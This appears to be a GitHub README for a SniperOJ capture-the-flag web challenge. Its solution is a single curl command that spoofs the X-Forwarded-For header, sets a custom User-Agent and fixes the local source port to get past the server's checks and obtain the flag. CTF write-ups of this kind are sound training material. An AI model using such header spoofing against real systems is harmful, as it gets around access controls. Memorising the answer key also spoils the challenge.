Skip to content

Latest commit

 

History

History
16 lines (13 loc) · 279 Bytes

README.md

File metadata and controls

16 lines (13 loc) · 279 Bytes

Goals

  • Try to find the flag

Server Address

Solution

curl http://127.0.0.1/ \
    --header 'X-Forwarded-For:127.0.0.1' \
    --header 'User-Agent:SniperOJ-Web-Broswer' \
    --local-port 23333

Other Solutions